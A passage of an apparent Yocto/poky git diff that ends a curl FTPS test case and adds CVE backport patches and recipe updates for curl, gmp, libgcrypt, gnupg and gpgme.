command\r\n331 give password\r\n230 Authenticated\r\n257 "/"\r\n200 OK\r\n200 OK\r\n200 OK\r\n226 Transfer complete ++REPLY PASS 530 Login incorrect ++ ++ ++ ++# Client-side ++ ++ ++SSL ++ ++ ++ftp ++ ++ ++FTP STARTTLS pipelined server response ++ ++ ++data ++ to ++ see ++that FTPS ++works ++ so does it? ++ ++ ++--ssl --ftp-ssl-control ftp://%HOSTIP:%FTPPORT/%TESTNUMBER -T log/test%TESTNUMBER.txt -u user:secret -P %CLIENTIP ++ ++ ++ ++# Verify data after the test has been "shot" ++ ++# 8 is CURLE_WEIRD_SERVER_REPLY ++ ++8 ++ ++ ++AUTH SSL ++ ++ ++ diff --git a/poky/meta/recipes-support/curl/curl_7.69.1.bb b/poky/meta/recipes-support/curl/curl_7.69.1.bb index 21c673feda..bc1b993e9e 100644 --- a/poky/meta/recipes-support/curl/curl_7.69.1.bb +++ b/poky/meta/recipes-support/curl/curl_7.69.1.bb @@ -22,6 +22,9 @@ SRC_URI = "https://curl.haxx.se/download/curl-${PV}.tar.bz2 \ file://CVE-2021-22898.patch \ file://CVE-2021-22924.patch \ file://CVE-2021-22925.patch \ + file://CVE-2021-22946-pre1.patch \ + file://CVE-2021-22946.patch \ + file://CVE-2021-22947.patch \ " SRC_URI[md5sum] = "ec5fc263f898a3dfef08e805f1ecca42" @@ -29,7 +32,12 @@ SRC_URI[sha256sum] = "2ff5e5bd507adf6aa88ff4bbafd4c7af464867ffb688be93b9930717a5 # Curl has used many names over the years... CVE_PRODUCT = "haxx:curl haxx:libcurl curl:curl curl:libcurl libcurl:libcurl daniel_stenberg:curl" -CVE_CHECK_WHITELIST = "CVE-2021-22922 CVE-2021-22923 CVE-2021-22926" +CVE_CHECK_WHITELIST = "CVE-2021-22922 CVE-2021-22923 CVE-2021-22926 CVE-22945" + +# As per link https://security-tracker.debian.org/tracker/CVE-2021-22897 +# and https://ubuntu.com/security/CVE-2021-22897 +# This CVE issue affects Windows only Hence whitelisting this CVE +CVE_CHECK_WHITELIST += "CVE-2021-22897" inherit autotools pkgconfig binconfig multilib_header diff --git a/poky/meta/recipes-support/dos2unix/dos2unix_7.4.1.bb b/poky/meta/recipes-support/dos2unix/dos2unix_7.4.1.bb index 1623285fd0..ea34e4c7a3 100644 --- a/poky/meta/recipes-support/dos2unix/dos2unix_7.4.1.bb +++ b/poky/meta/recipes-support/dos2unix/dos2unix_7.4.1.bb @@ -8,7 +8,7 @@ SECTION = "support" LICENSE = "BSD-2-Clause" LIC_FILES_CHKSUM = "file://COPYING.txt;md5=0c977b18f0a384d03597a517d7d03e32" -SRC_URI = "git://git.code.sf.net/p/dos2unix/dos2unix" +SRC_URI = "git://git.code.sf.net/p/dos2unix/dos2unix;branch=master" UPSTREAM_CHECK_GITTAGREGEX = "dos2unix-(?P(\d+(\.\d+)+))" SRCREV = "0490f0723b1a0851b17343f6164915f3474b5197" diff --git a/poky/meta/recipes-support/gmp/gmp/cve-2021-43618.patch b/poky/meta/recipes-support/gmp/gmp/cve-2021-43618.patch new file mode 100644 index 0000000000..095fb21eaa --- /dev/null +++ b/poky/meta/recipes-support/gmp/gmp/cve-2021-43618.patch @@ -0,0 +1,27 @@ +CVE: CVE-2021-43618 +Upstream-Status: Backport +Signed-off-by: Ross Burton + +# HG changeset patch +# User Marco Bodrato +# Date 1634836009 -7200 +# Node ID 561a9c25298e17bb01896801ff353546c6923dbd +# Parent e1fd9db13b475209a864577237ea4b9105b3e96e +mpz/inp_raw.c: Avoid bit size overflows + +diff -r e1fd9db13b47 -r 561a9c25298e mpz/inp_raw.c +--- a/mpz/inp_raw.c Tue Dec 22 23:49:51 2020 +0100 ++++ b/mpz/inp_raw.c Thu Oct 21 19:06:49 2021 +0200 +@@ -88,8 +88,11 @@ + + abs_csize = ABS (csize); + ++ if (UNLIKELY (abs_csize > ~(mp_bitcnt_t) 0 / 8)) ++ return 0; /* Bit size overflows */ ++ + /* round up to a multiple of limbs */ +- abs_xsize = BITS_TO_LIMBS (abs_csize*8); ++ abs_xsize = BITS_TO_LIMBS ((mp_bitcnt_t) abs_csize * 8); + + if (abs_xsize != 0) + { diff --git a/poky/meta/recipes-support/gmp/gmp_6.2.0.bb b/poky/meta/recipes-support/gmp/gmp_6.2.0.bb index a19c74fca8..d29b74f829 100644 --- a/poky/meta/recipes-support/gmp/gmp_6.2.0.bb +++ b/poky/meta/recipes-support/gmp/gmp_6.2.0.bb @@ -12,6 +12,7 @@ SRC_URI = "https://gmplib.org/download/${BPN}/${BP}${REVISION}.tar.bz2 \ file://use-includedir.patch \ file://0001-Append-the-user-provided-flags-to-the-auto-detected-.patch \ file://0001-confiure.ac-Believe-the-cflags-from-environment.patch \ + file://cve-2021-43618.patch \ " SRC_URI[md5sum] = "c24161e0dd44cae78cd5f67193492a21" SRC_URI[sha256sum] = "f51c99cb114deb21a60075ffb494c1a210eb9d7cb729ed042ddb7de9534451ea" diff --git a/poky/meta/recipes-support/gnome-desktop-testing/gnome-desktop-testing_2018.1.bb b/poky/meta/recipes-support/gnome-desktop-testing/gnome-desktop-testing_2018.1.bb index e5c69c0c46..19f32e8d1f 100644 --- a/poky/meta/recipes-support/gnome-desktop-testing/gnome-desktop-testing_2018.1.bb +++ b/poky/meta/recipes-support/gnome-desktop-testing/gnome-desktop-testing_2018.1.bb @@ -9,7 +9,7 @@ LICENSE = "LGPLv2+" LIC_FILES_CHKSUM = "file://COPYING;md5=3bf50002aefd002f49e7bb854063f7e7 \ file://src/gnome-desktop-testing-runner.c;beginline=1;endline=20;md5=7ef3ad9da2ffcf7707dc11151fe007f4" -SRC_URI = "git://gitlab.gnome.org/GNOME/gnome-desktop-testing.git;protocol=http" +SRC_URI = "git://gitlab.gnome.org/GNOME/gnome-desktop-testing.git;protocol=http;branch=master" SRCREV = "4decade67b29ad170fcf3de148e41695fc459f48" DEPENDS = "glib-2.0" diff --git a/poky/meta/recipes-support/gnupg/gnupg/0001-configure.ac-use-a-custom-value-for-the-location-of-.patch b/poky/meta/recipes-support/gnupg/gnupg/0001-configure.ac-use-a-custom-value-for-the-location-of-.patch index 2c204e0245..a0af2d48dc 100644 --- a/poky/meta/recipes-support/gnupg/gnupg/0001-configure.ac-use-a-custom-value-for-the-location-of-.patch +++ b/poky/meta/recipes-support/gnupg/gnupg/0001-configure.ac-use-a-custom-value-for-the-location-of-.patch @@ -1,4 +1,4 @@ -From e7ad11cf54475e455fdb84d118e4782961698567 Mon Sep 17 00:00:00 2001 +From abc5c396aaddaef2e6811362e3e0cc0da28c2b34 Mon Sep 17 00:00:00 2001 From: Alexander Kanavin Date: Mon, 22 Jan 2018 18:00:21 +0200 Subject: [PATCH] configure.ac: use a custom value for the location of @@ -14,10 +14,10 @@ Signed-off-by: Alexander Kanavin 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/configure.ac b/configure.ac -index 919ab31..cd58fdb 100644 +index 64cb8c6..3fe9027 100644 --- a/configure.ac +++ b/configure.ac -@@ -1855,7 +1855,7 @@ AC_DEFINE_UNQUOTED(GPGCONF_DISP_NAME, "GPGConf", +@@ -1824,7 +1824,7 @@ AC_DEFINE_UNQUOTED(GPGCONF_DISP_NAME, "GPGConf", AC_DEFINE_UNQUOTED(GPGTAR_NAME, "gpgtar", [The name of the gpgtar tool]) diff --git a/poky/meta/recipes-support/gnupg/gnupg/0003-dirmngr-uses-libgpg-error.patch b/poky/meta/recipes-support/gnupg/gnupg/0003-dirmngr-uses-libgpg-error.patch index 3e798efd06..a13b4d5fb5 100644 --- a/poky/meta/recipes-support/gnupg/gnupg/0003-dirmngr-uses-libgpg-error.patch +++ b/poky/meta/recipes-support/gnupg/gnupg/0003-dirmngr-uses-libgpg-error.patch @@ -1,7 +1,7 @@ -From 9c3858ffda6246bf9e1e6aeeb920532a56b19408 Mon Sep 17 00:00:00 2001 +From 6c75656b68cb6e38b039ae532bd39437cd6daec5 Mon Sep 17 00:00:00 2001 From: Saul Wold Date: Wed, 16 Aug 2017 11:18:01 +0800 -Subject: [PATCH 3/4] dirmngr uses libgpg error +Subject: [PATCH] dirmngr uses libgpg error Upstream-Status: Pending Signed-off-by: Saul Wold @@ -9,24 +9,20 @@ Signed-off-by: Saul Wold Rebase to 2.1.23 Signed-off-by: Hongxu Jia + --- - dirmngr/Makefile.am | 3 ++- - 1 file changed, 2 insertions(+), 1 deletion(-) + dirmngr/Makefile.am | 1 + + 1 file changed, 1 insertion(+) diff --git a/dirmngr/Makefile.am b/dirmngr/Makefile.am -index b404165..d3f916e 100644 +index 00d3c42..450d873 100644 --- a/dirmngr/Makefile.am +++ b/dirmngr/Makefile.am -@@ -82,7 +82,8 @@ endif - dirmngr_LDADD = $(libcommonpth) \ +@@ -101,6 +101,7 @@ dirmngr_LDADD = $(libcommonpth) \ $(DNSLIBS) $(LIBASSUAN_LIBS) \ $(LIBGCRYPT_LIBS) $(KSBA_LIBS) $(NPTH_LIBS) \ -- $(NTBTLS_LIBS) $(LIBGNUTLS_LIBS) $(LIBINTL) $(LIBICONV) -+ $(NTBTLS_LIBS) $(LIBGNUTLS_LIBS) $(LIBINTL) $(LIBICONV) \ -+ $(GPG_ERROR_LIBS) + $(NTBTLS_LIBS) $(LIBGNUTLS_LIBS) $(LIBINTL) $(LIBICONV) $(NETLIBS) \ ++ $(GPG_ERROR_LIBS) \ + $(dirmngr_robj) if USE_LDAP dirmngr_LDADD += $(ldaplibs) - endif --- -1.8.3.1 - diff --git a/poky/meta/recipes-support/gnupg/gnupg/relocate.patch b/poky/meta/recipes-support/gnupg/gnupg/relocate.patch index e5a82aa76d..7f7812cd46 100644 --- a/poky/meta/recipes-support/gnupg/gnupg/relocate.patch +++ b/poky/meta/recipes-support/gnupg/gnupg/relocate.patch @@ -1,4 +1,4 @@ -From 59c077f32e81190955910cae02599c7a3edfa7fb Mon Sep 17 00:00:00 2001 +From bd66af2ac7bb6d9294ac8055a55462ba7c4f9c9b Mon Sep 17 00:00:00 2001 From: Ross Burton Date: Wed, 19 Sep 2018 14:44:40 +0100 Subject: [PATCH] Allow the environment to override where gnupg looks for its @@ -12,10 +12,10 @@ Signed-off-by: Ross Burton 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/common/homedir.c b/common/homedir.c -index e9e75d0..19140aa 100644 +index 4b6e46e..58989b4 100644 --- a/common/homedir.c +++ b/common/homedir.c -@@ -760,7 +760,7 @@ gnupg_socketdir (void) +@@ -763,7 +763,7 @@ gnupg_socketdir (void) if (!name) { unsigned int dummy; @@ -24,7 +24,7 @@ index e9e75d0..19140aa 100644 } return name; -@@ -786,7 +786,7 @@ gnupg_sysconfdir (void) +@@ -789,7 +789,7 @@ gnupg_sysconfdir (void) } return name; #else /*!HAVE_W32_SYSTEM*/ @@ -33,7 +33,7 @@ index e9e75d0..19140aa 100644 #endif /*!HAVE_W32_SYSTEM*/ } -@@ -815,7 +815,7 @@ gnupg_bindir (void) +@@ -818,7 +818,7 @@ gnupg_bindir (void) else return rdir; #else /*!HAVE_W32_SYSTEM*/ @@ -42,7 +42,7 @@ index e9e75d0..19140aa 100644 #endif /*!HAVE_W32_SYSTEM*/ } -@@ -828,7 +828,7 @@ gnupg_libexecdir (void) +@@ -831,7 +831,7 @@ gnupg_libexecdir (void) #ifdef HAVE_W32_SYSTEM return gnupg_bindir (); #else /*!HAVE_W32_SYSTEM*/ @@ -51,7 +51,7 @@ index e9e75d0..19140aa 100644 #endif /*!HAVE_W32_SYSTEM*/ } -@@ -842,7 +842,7 @@ gnupg_libdir (void) +@@ -845,7 +845,7 @@ gnupg_libdir (void) name = xstrconcat (w32_rootdir (), DIRSEP_S "lib" DIRSEP_S "gnupg", NULL); return name; #else /*!HAVE_W32_SYSTEM*/ @@ -60,7 +60,7 @@ index e9e75d0..19140aa 100644 #endif /*!HAVE_W32_SYSTEM*/ } -@@ -856,7 +856,7 @@ gnupg_datadir (void) +@@ -859,7 +859,7 @@ gnupg_datadir (void) name = xstrconcat (w32_rootdir (), DIRSEP_S "share" DIRSEP_S "gnupg", NULL); return name; #else /*!HAVE_W32_SYSTEM*/ @@ -69,7 +69,7 @@ index e9e75d0..19140aa 100644 #endif /*!HAVE_W32_SYSTEM*/ } -@@ -872,7 +872,7 @@ gnupg_localedir (void) +@@ -875,7 +875,7 @@ gnupg_localedir (void) NULL); return name; #else /*!HAVE_W32_SYSTEM*/ @@ -78,7 +78,7 @@ index e9e75d0..19140aa 100644 #endif /*!HAVE_W32_SYSTEM*/ } -@@ -940,7 +940,7 @@ gnupg_cachedir (void) +@@ -943,7 +943,7 @@ gnupg_cachedir (void) } return dir; #else /*!HAVE_W32_SYSTEM*/ diff --git a/poky/meta/recipes-support/gnupg/gnupg_2.2.20.bb b/poky/meta/recipes-support/gnupg/gnupg_2.2.20.bb deleted file mode 100644 index 6629fc8556..0000000000 --- a/poky/meta/recipes-support/gnupg/gnupg_2.2.20.bb +++ /dev/null @@ -1,86 +0,0 @@ -SUMMARY = "GNU Privacy Guard - encryption and signing tools (2.x)" -DESCRIPTION = "A complete and free implementation of the OpenPGP standard \ -as defined by RFC4880 (also known as PGP). GnuPG allows you to encrypt \ -and sign your data and communications; it features a versatile key \ -management system, along with access modules for all kinds of public \ -key directories." -HOMEPAGE = "http://www.gnupg.org/" -LICENSE = "GPLv3 & LGPLv3" -LIC_FILES_CHKSUM = "file://COPYING;md5=189af8afca6d6075ba6c9e0aa8077626 \ - file://COPYING.LGPL3;md5=a2b6bf2cb38ee52619e60f30a1fc7257" - -DEPENDS = "npth libassuan libksba zlib bzip2 readline libgcrypt" - -inherit autotools gettext texinfo pkgconfig - -UPSTREAM_CHECK_URI = "https://gnupg.org/download/index.html" -SRC_URI = "${GNUPG_MIRROR}/${BPN}/${BPN}-${PV}.tar.bz2 \ - file://0001-Use-pkg-config-to-find-pth-instead-of-pth-config.patch \ - file://0002-use-pkgconfig-instead-of-npth-config.patch \ - file://0003-dirmngr-uses-libgpg-error.patch \ - file://0004-autogen.sh-fix-find-version-for-beta-checking.patch \ - file://0001-Woverride-init-is-not-needed-with-gcc-9.patch \ - " -SRC_URI_append_class-native = " file://0001-configure.ac-use-a-custom-value-for-the-location-of-.patch \ - file://relocate.patch" -SRC_URI_append_class-nativesdk = " file://relocate.patch" - -SRC_URI[md5sum] = "4ff88920cf52b35db0dedaee87bdbbb1" -SRC_URI[sha256sum] = "04a7c9d48b74c399168ee8270e548588ddbe52218c337703d7f06373d326ca30" - -EXTRA_OECONF = "--disable-ldap \ - --disable-ccid-driver \ - --with-zlib=${STAGING_LIBDIR}/.. \ - --with-bzip2=${STAGING_LIBDIR}/.. \ - --with-readline=${STAGING_LIBDIR}/.. \ - --enable-gpg-is-gpg2 \ - " - -# A minimal package containing just enough to run gpg+gpgagent (E.g. use gpgme in opkg) -PACKAGES =+ "${PN}-gpg" -FILES_${PN}-gpg = " \ - ${bindir}/gpg \ - ${bindir}/gpg2 \ - ${bindir}/gpg-agent \ -" - -# Normal package (gnupg) should depend on minimal package (gnupg-gpg) -# to ensure all tools are included. This is done only in non-native -# builds. Native builds don't have sub-packages, so appending RDEPENDS -# in this case breaks recipe parsing. -RDEPENDS_${PN} += "${@ "" if ("native" in d.getVar("PN")) else (d.getVar("PN") + "-gpg")}" - -RRECOMMENDS_${PN} = "pinentry" - -do_configure_prepend () { - # Else these could be used in prefernce to those in aclocal-copy - rm -f ${S}/m4/gpg-error.m4 - rm -f ${S}/m4/libassuan.m4 - rm -f ${S}/m4/ksba.m4 - rm -f ${S}/m4/libgcrypt.m4 -} - -do_install_append() { - ln -sf gpg2 ${D}${bindir}/gpg - ln -sf gpgv2 ${D}${bindir}/gpgv -} - -do_install_append_class-native() { - create_wrappers ${STAGING_BINDIR_NATIVE} -} - -do_install_append_class-nativesdk() { - create_wrappers ${SDKPATHNATIVE}${bindir_nativesdk} -} - -create_wrappers() { - for i in gpg2 gpgconf gpg-agent gpg-connect-agent; do - create_wrapper ${D}${bindir}/$i GNUPG_BINDIR=$1 - done -} - -PACKAGECONFIG ??= "gnutls" -PACKAGECONFIG[gnutls] = "--enable-gnutls, --disable-gnutls, gnutls" -PACKAGECONFIG[sqlite3] = "--enable-sqlite, --disable-sqlite, sqlite3" - -BBCLASSEXTEND = "native nativesdk" diff --git a/poky/meta/recipes-support/gnupg/gnupg_2.2.27.bb b/poky/meta/recipes-support/gnupg/gnupg_2.2.27.bb new file mode 100644 index 0000000000..18bb855769 --- /dev/null +++ b/poky/meta/recipes-support/gnupg/gnupg_2.2.27.bb @@ -0,0 +1,86 @@ +SUMMARY = "GNU Privacy Guard - encryption and signing tools (2.x)" +DESCRIPTION = "A complete and free implementation of the OpenPGP standard \ +as defined by RFC4880 (also known as PGP). GnuPG allows you to encrypt \ +and sign your data and communications; it features a versatile key \ +management system, along with access modules for all kinds of public \ +key directories." +HOMEPAGE = "http://www.gnupg.org/" +LICENSE = "GPLv3 & LGPLv3" +LIC_FILES_CHKSUM = "file://COPYING;md5=189af8afca6d6075ba6c9e0aa8077626 \ + file://COPYING.LGPL3;md5=a2b6bf2cb38ee52619e60f30a1fc7257" + +DEPENDS = "npth libassuan libksba zlib bzip2 readline libgcrypt" + +inherit autotools gettext texinfo pkgconfig + +UPSTREAM_CHECK_URI = "https://gnupg.org/download/index.html" +SRC_URI = "${GNUPG_MIRROR}/${BPN}/${BPN}-${PV}.tar.bz2 \ + file://0001-Use-pkg-config-to-find-pth-instead-of-pth-config.patch \ + file://0002-use-pkgconfig-instead-of-npth-config.patch \ + file://0003-dirmngr-uses-libgpg-error.patch \ + file://0004-autogen.sh-fix-find-version-for-beta-checking.patch \ + file://0001-Woverride-init-is-not-needed-with-gcc-9.patch \ + " +SRC_URI_append_class-native = " file://0001-configure.ac-use-a-custom-value-for-the-location-of-.patch \ + file://relocate.patch" +SRC_URI_append_class-nativesdk = " file://relocate.patch" + +SRC_URI[sha256sum] = "34e60009014ea16402069136e0a5f63d9b65f90096244975db5cea74b3d02399" + +EXTRA_OECONF = "--disable-ldap \ + --disable-ccid-driver \ + --with-zlib=${STAGING_LIBDIR}/.. \ + --with-bzip2=${STAGING_LIBDIR}/.. \ + --with-readline=${STAGING_LIBDIR}/.. \ + --with-mailprog=${sbindir}/sendmail \ + --enable-gpg-is-gpg2 \ + " + +# A minimal package containing just enough to run gpg+gpgagent (E.g. use gpgme in opkg) +PACKAGES =+ "${PN}-gpg" +FILES_${PN}-gpg = " \ + ${bindir}/gpg \ + ${bindir}/gpg2 \ + ${bindir}/gpg-agent \ +" + +# Normal package (gnupg) should depend on minimal package (gnupg-gpg) +# to ensure all tools are included. This is done only in non-native +# builds. Native builds don't have sub-packages, so appending RDEPENDS +# in this case breaks recipe parsing. +RDEPENDS_${PN} += "${@ "" if ("native" in d.getVar("PN")) else (d.getVar("PN") + "-gpg")}" + +RRECOMMENDS_${PN} = "pinentry" + +do_configure_prepend () { + # Else these could be used in prefernce to those in aclocal-copy + rm -f ${S}/m4/gpg-error.m4 + rm -f ${S}/m4/libassuan.m4 + rm -f ${S}/m4/ksba.m4 + rm -f ${S}/m4/libgcrypt.m4 +} + +do_install_append() { + ln -sf gpg2 ${D}${bindir}/gpg + ln -sf gpgv2 ${D}${bindir}/gpgv +} + +do_install_append_class-native() { + create_wrappers ${STAGING_BINDIR_NATIVE} +} + +do_install_append_class-nativesdk() { + create_wrappers ${SDKPATHNATIVE}${bindir_nativesdk} +} + +create_wrappers() { + for i in gpg2 gpgconf gpg-agent gpg-connect-agent; do + create_wrapper ${D}${bindir}/$i GNUPG_BINDIR=$1 + done +} + +PACKAGECONFIG ??= "gnutls" +PACKAGECONFIG[gnutls] = "--enable-gnutls, --disable-gnutls, gnutls" +PACKAGECONFIG[sqlite3] = "--enable-sqlite, --disable-sqlite, sqlite3" + +BBCLASSEXTEND = "native nativesdk" diff --git a/poky/meta/recipes-support/gpgme/gpgme/0001-use-closefrom-on-linux-and-glibc-2.34.patch b/poky/meta/recipes-support/gpgme/gpgme/0001-use-closefrom-on-linux-and-glibc-2.34.patch new file mode 100644 index 0000000000..1c46684c6d --- /dev/null +++ b/poky/meta/recipes-support/gpgme/gpgme/0001-use-closefrom-on-linux-and-glibc-2.34.patch @@ -0,0 +1,24 @@ +From adb1d4e5498a19e9d591ac8f42f9ddfdb23a1354 Mon Sep 17 00:00:00 2001 +From: Khem Raj +Date: Thu, 15 Jul 2021 12:33:13 -0700 +Subject: [PATCH] use closefrom() on linux and glibc 2.34+ + +Upstream-Status: Pending +Signed-off-by: Khem Raj +--- + src/posix-io.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/src/posix-io.c b/src/posix-io.c +index e712ef2..ab8ded9 100644 +--- a/src/posix-io.c ++++ b/src/posix-io.c +@@ -570,7 +570,7 @@ _gpgme_io_spawn (const char *path, char *const argv[], unsigned int flags, + if (fd_list[i].fd > fd) + fd = fd_list[i].fd; + fd++; +-#if defined(__sun) || defined(__FreeBSD__) ++#if defined(__sun) || defined(__FreeBSD__) || (defined(__GLIBC__) && __GNUC_PREREQ(2, 34)) + closefrom (fd); + max_fds = fd; + #else /*!__sun */ diff --git a/poky/meta/recipes-support/gpgme/gpgme_1.13.1.bb b/poky/meta/recipes-support/gpgme/gpgme_1.13.1.bb index 6e945d3165..dacc9896e4 100644 --- a/poky/meta/recipes-support/gpgme/gpgme_1.13.1.bb +++ b/poky/meta/recipes-support/gpgme/gpgme_1.13.1.bb @@ -20,7 +20,8 @@ SRC_URI = "${GNUPG_MIRROR}/gpgme/${BP}.tar.bz2 \ file://0006-fix-build-path-issue.patch \ file://0007-python-Add-variables-to-tests.patch \ file://0008-do-not-auto-check-var-PYTHON.patch \ - " + file://0001-use-closefrom-on-linux-and-glibc-2.34.patch \ + " SRC_URI[md5sum] = "198f0a908ec3cd8f0ce9a4f3a4489645" SRC_URI[sha256sum] = "c4e30b227682374c23cddc7fdb9324a99694d907e79242a25a4deeedb393be46" diff --git a/poky/meta/recipes-support/libgcrypt/files/CVE-2021-33560.patch b/poky/meta/recipes-support/libgcrypt/files/CVE-2021-33560.patch new file mode 100644 index 0000000000..bf26486d8b --- /dev/null +++ b/poky/meta/recipes-support/libgcrypt/files/CVE-2021-33560.patch @@ -0,0 +1,77 @@ +From e8b7f10be275bcedb5fc05ed4837a89bfd605c61 Mon Sep 17 00:00:00 2001 +From: NIIBE Yutaka +Date: Tue, 13 Apr 2021 10:00:00 +0900 +Subject: [PATCH] cipher: Hardening ElGamal by introducing exponent blinding + too. + +* cipher/elgamal.c (do_encrypt): Also do exponent blinding. + +-- + +Base blinding had been introduced with USE_BLINDING. This patch add +exponent blinding as well to mitigate side-channel attack on mpi_powm. + +GnuPG-bug-id: 5328 +Signed-off-by: NIIBE Yutaka + +Upstream-Status: Backport +CVE: CVE-2021-33560 +Signed-off-by: Marta Rybczynska +--- + cipher/elgamal.c | 20 +++++++++++++++++--- + 1 file changed, 17 insertions(+), 3 deletions(-) + +diff --git a/cipher/elgamal.c b/cipher/elgamal.c +index 4eb52d62..9835122f 100644 +--- a/cipher/elgamal.c ++++ b/cipher/elgamal.c +@@ -522,8 +522,9 @@ do_encrypt(gcry_mpi_t a, gcry_mpi_t b, gcry_mpi_t input, ELG_public_key *pkey ) + static void + decrypt (gcry_mpi_t output, gcry_mpi_t a, gcry_mpi_t b, ELG_secret_key *skey ) + { +- gcry_mpi_t t1, t2, r; ++ gcry_mpi_t t1, t2, r, r1, h; + unsigned int nbits = mpi_get_nbits (skey->p); ++ gcry_mpi_t x_blind; + + mpi_normalize (a); + mpi_normalize (b); +@@ -534,20 +535,33 @@ decrypt (gcry_mpi_t output, gcry_mpi_t a, gcry_mpi_t b, ELG_secret_key *skey ) + + t2 = mpi_snew (nbits); + r = mpi_new (nbits); ++ r1 = mpi_new (nbits); ++ h = mpi_new (nbits); ++ x_blind = mpi_snew (nbits); + + /* We need a random number of about the prime size. The random + number merely needs to be unpredictable; thus we use level 0. */ + _gcry_mpi_randomize (r, nbits, GCRY_WEAK_RANDOM); + ++ /* Also, exponent blinding: x_blind = x + (p-1)*r1 */ ++ _gcry_mpi_randomize (r1, nbits, GCRY_WEAK_RANDOM); ++ mpi_set_highbit (r1, nbits - 1); ++ mpi_sub_ui (h, skey->p, 1); ++ mpi_mul (x_blind, h, r1); ++ mpi_add (x_blind, skey->x, x_blind); ++ + /* t1 = r^x mod p */ +- mpi_powm (t1, r, skey->x, skey->p); ++ mpi_powm (t1, r, x_blind, skey->p); + /* t2 = (a * r)^-x mod p */ + mpi_mulm (t2, a, r, skey->p); +- mpi_powm (t2, t2, skey->x, skey->p); ++ mpi_powm (t2, t2, x_blind, skey->p); + mpi_invm (t2, t2, skey->p); + /* t1 = (t1 * t2) mod p*/ + mpi_mulm (t1, t1, t2, skey->p); + ++ mpi_free (x_blind); ++ mpi_free (h); ++ mpi_free (r1); + mpi_free (r); + mpi_free (t2); + +-- +2.11.0 + diff --git a/poky/meta/recipes-support/libgcrypt/files/CVE-2021-40528.patch b/poky/meta/recipes-support/libgcrypt/files/CVE-2021-40528.patch new file mode 100644 index 0000000000..b3a18bc5aa --- /dev/null +++ b/poky/meta/recipes-support/libgcrypt/files/CVE-2021-40528.patch @@ -0,0 +1,109 @@ +From 707c3c5c511ee70ad0e39ec613471f665305fbea Mon Sep 17 00:00:00 2001 +From: NIIBE Yutaka +Date: Fri, 21 May 2021 11:15:07 +0900 +Subject: [PATCH] cipher: Fix ElGamal encryption for other implementations. + +* cipher/elgamal.c (gen_k): Remove support of smaller K. +(do_encrypt): Never use smaller K. +(sign): Folllow the change of gen_k. + +-- + +Cherry-pick master commit of: + 632d80ef30e13de6926d503aa697f92b5dbfbc5e + +This change basically reverts encryption changes in two commits: + + 74386120dad6b3da62db37f7044267c8ef34689b + 78531373a342aeb847950f404343a05e36022065 + +Use of smaller K for ephemeral key in ElGamal encryption is only good, +when we can guarantee that recipient's key is generated by our +implementation (or compatible). + +For detail, please see: + + Luca De Feo, Bertram Poettering, Alessandro Sorniotti, + "On the (in)security of ElGamal in OpenPGP"; + in the proceedings of CCS'2021. + +CVE-id: CVE-2021-33560 +GnuPG-bug-id: 5328 +Suggested-by: Luca De Feo, Bertram Poettering, Alessandro Sorniotti +Signed-off-by: NIIBE Yutaka + +Upstream-Status: Backport +CVE: CVE-2021-40528 +Signed-off-by: Armin Kuster +--- + cipher/elgamal.c | 24 ++++++------------------ + 1 file changed, 6 insertions(+), 18 deletions(-) + +diff --git a/cipher/elgamal.c b/cipher/elgamal.c +index 4eb52d62..ae7a631e 100644 +--- a/cipher/elgamal.c ++++ b/cipher/elgamal.c +@@ -66,7 +66,7 @@ static const char *elg_names[] = + + + static int test_keys (ELG_secret_key *sk, unsigned int nbits, int nodie); +-static gcry_mpi_t gen_k (gcry_mpi_t p, int small_k); ++static gcry_mpi_t gen_k (gcry_mpi_t p); + static gcry_err_code_t generate (ELG_secret_key *sk, unsigned nbits, + gcry_mpi_t **factors); + static int check_secret_key (ELG_secret_key *sk); +@@ -189,11 +189,10 @@ test_keys ( ELG_secret_key *sk, unsigned int nbits, int nodie ) + + /**************** + * Generate a random secret exponent k from prime p, so that k is +- * relatively prime to p-1. With SMALL_K set, k will be selected for +- * better encryption performance - this must never be used signing! ++ * relatively prime to p-1. + */ + static gcry_mpi_t +-gen_k( gcry_mpi_t p, int small_k ) ++gen_k( gcry_mpi_t p ) + { + gcry_mpi_t k = mpi_alloc_secure( 0 ); + gcry_mpi_t temp = mpi_alloc( mpi_get_nlimbs(p) ); +@@ -202,18 +201,7 @@ gen_k( gcry_mpi_t p, int small_k ) + unsigned int nbits, nbytes; + char *rndbuf = NULL; + +- if (small_k) +- { +- /* Using a k much lesser than p is sufficient for encryption and +- * it greatly improves the encryption performance. We use +- * Wiener's table and add a large safety margin. */ +- nbits = wiener_map( orig_nbits ) * 3 / 2; +- if( nbits >= orig_nbits ) +- BUG(); +- } +- else +- nbits = orig_nbits; +- ++ nbits = orig_nbits; + + nbytes = (nbits+7)/8; + if( DBG_CIPHER ) +@@ -492,7 +480,7 @@ do_encrypt(gcry_mpi_t a, gcry_mpi_t b, gcry_mpi_t input, ELG_public_key *pkey ) + * error code. + */ + +- k = gen_k( pkey->p, 1 ); ++ k = gen_k( pkey->p ); + mpi_powm (a, pkey->g, k, pkey->p); + + /* b = (y^k * input) mod p +@@ -594,7 +582,7 @@ sign(gcry_mpi_t a, gcry_mpi_t b, gcry_mpi_t input, ELG_secret_key *skey ) + * + */ + mpi_sub_ui(p_1, p_1, 1); +- k = gen_k( skey->p, 0 /* no small K ! */ ); ++ k = gen_k( skey->p ); + mpi_powm( a, skey->g, k, skey->p ); + mpi_mul(t, skey->x, a ); + mpi_subm(t, input, t, p_1 ); +-- +2.30.2 + diff --git a/poky/meta/recipes-support/libgcrypt/libgcrypt_1.8.5.bb b/poky/meta/recipes-support/libgcrypt/libgcrypt_1.8.5.bb index 16a58ad9b8..8045bab9ed 100644 --- a/poky/meta/recipes-support/libgcrypt/libgcrypt_1.8.5.bb +++ b/poky/meta/recipes-support/libgcrypt/libgcrypt_1.8.5.bb @@ -28,6 +28,8 @@ SRC_URI = "${GNUPG_MIRROR}/libgcrypt/libgcrypt-${PV}.tar.bz2 \ file://0002-AES-move-look-up-tables-to-.data-section-and-unshare.patch \ file://0003-GCM-move-look-up-table-to-.data-section-and-unshare-.patch \ file://determinism.patch \ + file://CVE-2021-33560.patch \ + file://CVE-2021-40528.patch \ " SRC_URI[md5sum] = "348cc4601ca34307fc6cd6c945467743" SRC_URI[sha256sum] = "3b4a2a94cb637eff5bdebbcaf46f4d95c4f25206f459809339cdada0eb577ac3" diff --git 